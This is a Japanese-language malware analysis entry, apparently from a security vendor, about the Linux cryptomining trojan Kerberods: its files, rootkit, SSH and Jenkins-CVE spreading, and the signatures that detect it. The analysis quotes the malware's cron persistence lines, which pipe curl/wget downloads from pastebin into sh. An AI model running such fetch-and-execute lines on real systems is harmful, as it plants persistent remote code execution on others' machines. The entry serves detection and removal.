解析者: Warren Adam Sto. Tomas   

 別名:

Trojan.Linux.Coinminer (Ikarus)

 プラットフォーム:

Linux

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
    はい

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード

トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。

「Kerberods」は仮想通貨発掘マルウェア「khugepageds」(「Coinminer.Linux.MALXMR.UWEJI」として検出)とそのルートキットコンポーネントを作成します。また、Kerberodsは複数の拡散手法を持っています。1つはSSHを介した方法、もう1つは脆弱性「CVE-2019-1003000」および「CVE-2019-1003001」を利用する方法です。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 2900788 bytes
タイプ ELF
メモリ常駐 はい
発見日 2019年4月25日
ペイロード URLまたはIPアドレスに接続, ファイルの作成

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、感染したコンピュータ内に以下のように自身のコピーを作成します。

  • /usr/local/bin/kerberods
  • /usr/libexec/tmp/kerberods
  • /usr/bin/kerberods
  • /tmp/kerberods

マルウェアは、以下のファイルを作成します。

マルウェアは、以下のプロセスを追加します。

  • /tmp/khugepageds
  • /usr/local/lib/{random}.so

他のシステム変更

マルウェアは、以下のファイルを改変します。

  • /etc/hosts

マルウェアは、以下のファイルを削除します。

  • /usr/local/bin/kerberods
  • /usr/libexec/tmp/kerberods
  • /usr/bin/kerberods
  • /tmp/kerberods
  • /etc/ld.so.preload

その他

マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。

  • https://ident.me

<補足>
インストール

マルウェアは、以下のファイルを作成します。

  • /usr/local/lib/{ランダム}.c (ルートキットのソースコード)
  • /tmp/khugepageds - Coinminer.Linux.MALXMR.UWEJIとして検出
  • /usr/local/lib/{ランダム}.so (コンパイルされたソースコードの実行ファイル) - Rootkit.Linux.KERBERDS.Aとして検出

その他

マルウェアは、以下を実行します。

  • マルウェアは、自身の自動実行を可能にするために以下のサービスを作成します。
    • /etc/init.d/netdns
    • /usr/lib/systemd/system/netdns.service
  • 以下のcronジョブを作成して、10分ごとにpastebinにあるシェルスクリプトの自動実行を可能にします。
    • Path: /etc/cron.d/root
    • Content: */10 * * * * root (curl -fsSL https://pastebin.com/raw/{pastebinからの文字列}||wget -q -O- https://pastebin.com/raw/{pastebinからの文字列})|sh
  • 以下のcronジョブを作成して、15分ごとにpastebinにあるシェルスクリプトの自動実行を可能にします。
    • Paths:
      • /var/spool/cron/root
      • /var/spool/cron/crontabs/root
    • Content: */15 * * * * (curl -fsSL https://pastebin.com/raw/{pastebinからの文字列}||wget -q -O- https://pastebin.com/raw/{pastebinからの文字列})|sh
  • マルウェアは、以下の脆弱性を悪用することにより、他のデバイスに拡散する可能性があります。
    • CVE-2019-1003000
    • CVE-2019-1003001
    • SSHネットワークを介して
  • マルウェアは、以下のURLに接続します。
    • https://pastebin.com/raw/{BLOCKED}1u (作成されたcronジョブのpastebin URLに追加される文字列を含みます)
    • https://pastebin.com/raw/{BLOCKED}6H (更新を確認)
    • https://pastebin.com/raw/{BLOCKED}iX (情報公開日現在のcronジョブ内の完全なURL)
    • https://pastebin.com/raw/{BLOCKED}cb (脆弱なデバイス内にダウンロードされ実行されるシェルスクリプト)
  • 以下のプロセスを終了します。
    • "khugepageds"と名付けられたプロセス
    • CPU使用率が80%以上のプロセス
  • コンピュータ内にGCCをインストールして、ルートキットのソースコードをコンパイルしてから実行します。
  • マルウェアは不正利用するためにRedisサーバへのアクセスを試みます。

  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 14.970.05
初回 VSAPI パターンリリース日 2019年4月25日
VSAPI OPR パターンバージョン 14.971.00
VSAPI OPR パターンリリース日 2019年4月26日

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Linux.KERBERDS.A」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください